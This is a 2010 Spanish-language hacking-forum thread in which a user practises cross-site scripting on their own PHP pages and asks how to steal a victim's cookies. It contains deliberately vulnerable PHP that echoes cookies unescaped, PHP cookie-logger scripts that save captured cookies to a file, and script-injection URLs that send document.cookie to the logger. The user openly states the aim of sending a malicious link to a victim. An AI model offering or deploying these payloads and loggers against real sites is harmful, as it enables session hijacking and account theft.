elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  duda xss
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: duda xss  (Leído 3,079 veces)
Dr [F]

Desconectado Desconectado

Mensajes: 50


[H] Risk T [S] --> Dr [F]


Ver Perfil WWW
duda xss
« en: 24 Julio 2010, 08:55 am »

Hola gente del foro, estaba en casa intentando practicar xss leyendo tutoriales, pero no me sale :S

miren hize unas paginas vulnerables, pero me sigue sin salir:

pagina: pindex.php

Código:
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>

buscador.php

Código:
<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
?>
<html>
<head></head>
<body>
<a href="indexxx.php"> Pagina 1</a>
</body>
</html>

cookies.php

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, $cookie);
fclose($fff);
?>

y esta es la url que mando:

Código:
http://localhost/buscador.php?palabrita=
<script>window.location='http://localhost/cookies.php?cookie='+document.cookie;</script>&enviar=;

el problema es que no me crea el archivo archivo.txt :S

alguien sabe a que se debe.. ? gracias
En línea

"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: duda xss
« Respuesta #1 en: 24 Julio 2010, 19:34 pm »

aprende php, lo unico vulnerable es el pindex.php
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Dr [F]

Desconectado Desconectado

Mensajes: 50


[H] Risk T [S] --> Dr [F]


Ver Perfil WWW
Re: duda xss
« Respuesta #2 en: 24 Julio 2010, 19:51 pm »

es que no se que estoy haciendo mal -.-"
En línea

"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]
~ Yoya ~
Wiki

Desconectado Desconectado

Mensajes: 1.125



Ver Perfil
Re: duda xss
« Respuesta #3 en: 25 Julio 2010, 01:23 am »

No es necesario enviar el valor como una Cookie...

Puede ser que el servidor tenga  la directiva magic_quotes_gpc On y te escape las comillas simples y dobles de los valores que se envian via Get, Post o Cookie...

Prueba con este
Código
  1. <?php
  2. if(isset($_POST['palabrita'])){
  3. setcookie("user", $_POST['palabrita']);
  4. }
  5.  
  6. if(isset($_COOKIE['user'])){
  7. echo $_COOKIE['user'];
  8. }
  9.  
  10. ?>
  11.  
  12. <html>
  13. <head>
  14. </head>
  15. <body>
  16. <form method="post">
  17. <input type="text" name="palabrita">
  18. <br>
  19. <input type="submit" value="enviar"></form>
  20. </body>
  21. </html>
En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.
Dr [F]

Desconectado Desconectado

Mensajes: 50


[H] Risk T [S] --> Dr [F]


Ver Perfil WWW
Re: duda xss
« Respuesta #4 en: 25 Julio 2010, 07:56 am »

sigue sin salirme, sinceramente no se que estoy haciendo mal :S  :-[
En línea

"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]
Erfiug

Desconectado Desconectado

Mensajes: 44



Ver Perfil
Re: duda xss
« Respuesta #5 en: 25 Julio 2010, 16:39 pm »

Que nevegador utilizas? Algunos como IE8 tienen protecciones anti XSS que no permiten acceder directamente a la variable document.cookie
En línea

Dr [F]

Desconectado Desconectado

Mensajes: 50


[H] Risk T [S] --> Dr [F]


Ver Perfil WWW
Re: duda xss
« Respuesta #6 en: 25 Julio 2010, 21:22 pm »

sisi :) utilizo mozilla 3.6  miren me quede toda la noche ayer y logre obtener una fucking cookie..

les dejo los codigos :)

Código:
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input name="palabrita" type="text">
<br>
<input type="submit" value="enviar"></form>
<a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Click here for details</a>
</body>
</html>


buscador.php
Código:
<?php
$user = $_REQUEST['palabrita'];
setcookie("user", $user, time()+(60*60*24*365),"/");
echo $user;
?>
<html>
<head></head>
<body>
<a href="pindex.php"> Pagina 1</a>

lasla.php

Código:

<?php
$cookie = $_GET['cookie'];
$archivo ="datos.txt";
$f = fopen($archivo,"w");
fputs($f, $cookie);
fclose ($f);
?>



el problema es el siguiente, yo quiero mandar una url a la victima y que sus cookies de esa pagina vulnerable se envien a mi, pero no se que url "maliciosa" mandar... me entienden ?

ya que si mando estO:

Código:
<script><a
onclick="document.location='http://localhost/lalsa.php?cookie='+escape(document.cookie);" href="#"> Volver a la pagina</a></script>

me guarda en la cookie lo siguiente:

Código:
token=8c610b4ae58115e366123efd8e7b7accd7ba525a2207acc6; u=fra; c=a1305ca10f94f2340770c73e26d427588f236709; user=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Flocalhost%2Flalsa.php%3Fcookie%3D%27 escape%28document.cookie%29%3B%3C%2Fscript%3E;

y ahi no me esta guardando ningun usuario solo lo que puse acontinuacion de la variable palabrita :s
muchas gracias
« Última modificación: 25 Julio 2010, 23:03 pm por frankitox » En línea

"Una vulnerabilidad es tan limitada como tu quieres que lo sea"

[H] Risk T --> Dr [F]
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines